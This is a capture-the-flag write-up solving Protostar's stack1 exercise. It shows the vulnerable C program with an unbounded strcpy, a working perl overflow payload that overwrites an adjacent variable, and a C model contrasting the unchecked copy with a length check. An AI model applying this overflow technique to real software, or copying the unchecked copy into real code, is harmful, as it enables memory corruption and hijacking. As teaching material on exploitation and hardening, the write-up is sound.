Protostar exploits stack1


Protostar exploits are a cool bunch of CTF-type exercises that focus on Linux binary exploits and get progressively harder. An ISO containing the OS and challenges can be downloaded.

The website with all information and downloads is at


Test run

user@protostar:~$ /opt/protostar/bin/stack1 1
Try again, you got 0x00000000


Make the program respond with the message “you have correctly got the variable to the right value”.

#include <err.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  /* No argument given: print a message and exit. */
  if(argc == 1) {
    errx(1, "please specify an argument\n");
  }

  modified = 0;
  /* Unbounded copy: an argv[1] longer than 63 bytes writes past buffer. */
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
    printf("you have correctly got the variable to the right value\n");
  } else {
    printf("Try again, you got 0x%08x\n", modified);
  }
}
We can see the challenge statement will be displayed if the ‘modified’ variable is equal to the hex value “0x61626364”.

First off, we use the same trick as in challenge stack0: corrupt the stack through the “argv[1]” variable, which gets passed to the strcpy() call, and overwrite the “modified” variable. This time we need to overwrite it with the ASCII characters “dcba”=0x64636261, the target value in reverse byte order, because x86 stores integers little-endian.

Let’s see

user@protostar:~$ /opt/protostar/bin/stack1 `perl -e 'print "A"x65'`
Try again, you got 0x00000041

Using perl we were able to overflow the 64-byte ‘buffer’ variable. Perl wrote 65 A’s to stdout, which the backticks pass to the program as its argument. That is one byte more than was allocated, and the extra byte must have hit the ‘modified’ variable.

We appear to have hit one byte of modified with 0x41=A.

With some experimenting we are able to get the desired modified key.

user@protostar:~$ /opt/protostar/bin/stack1 `perl -e 'print "A"x64 . "dcba"'`
you have correctly got the variable to the right value
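
Why 64 filler bytes plus “dcba” yields 0x61626364, and what a length check changes, shown as an added example (not part of the original post or the Protostar source). It models the two locals as a struct, assuming ‘modified’ sits directly after ‘buffer’ and a little-endian host; struct frame, build_arg, unchecked and checked are names made up here.

```c
#include <stdio.h>
#include <string.h>

/* Model of the stack1 locals. Assumption: `modified` sits directly after
   `buffer`, as the 64-byte offset found above implies for the Protostar build. */
struct frame { char buffer[64]; unsigned int modified; };

/* Build the argument used in the post: `pad` filler bytes followed by `tail`.
   Caller keeps pad + strlen(tail) below 128 (size of the scratch buffers). */
static void build_arg(char *out, size_t pad, const char *tail)
{
    memset(out, 'A', pad);
    strcpy(out + pad, tail);
}

/* Unchecked copy, standing in for strcpy(buffer, argv[1]). The copy is clamped
   to the struct so the model itself stays well-defined; strcpy has no clamp. */
unsigned int unchecked(size_t pad, const char *tail)
{
    char arg[128];
    struct frame f;
    build_arg(arg, pad, tail);
    memset(&f, 0, sizeof f);                  /* modified = 0 */
    size_t n = strlen(arg);
    if (n > sizeof f) n = sizeof f;
    memcpy(&f, arg, n);                       /* bytes past 64 land in modified */
    return f.modified;                        /* read back little-endian */
}

/* Hardened copy: refuse anything that does not fit with its NUL terminator.
   Returns -1 on rejection, otherwise the (untouched) value of modified. */
long checked(size_t pad, const char *tail)
{
    char arg[128];
    struct frame f;
    build_arg(arg, pad, tail);
    memset(&f, 0, sizeof f);
    if (strlen(arg) >= sizeof f.buffer) return -1;
    strcpy(f.buffer, arg);                    /* safe: length checked above */
    return (long)f.modified;
}

int main(void)
{
    printf("unchecked 65 x A        -> 0x%08x\n", unchecked(65, ""));
    printf("unchecked 64 x A + dcba -> 0x%08x\n", unchecked(64, "dcba"));
    printf("checked   64 x A + dcba -> %ld\n", checked(64, "dcba"));
    return 0;
}
```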

Thank you

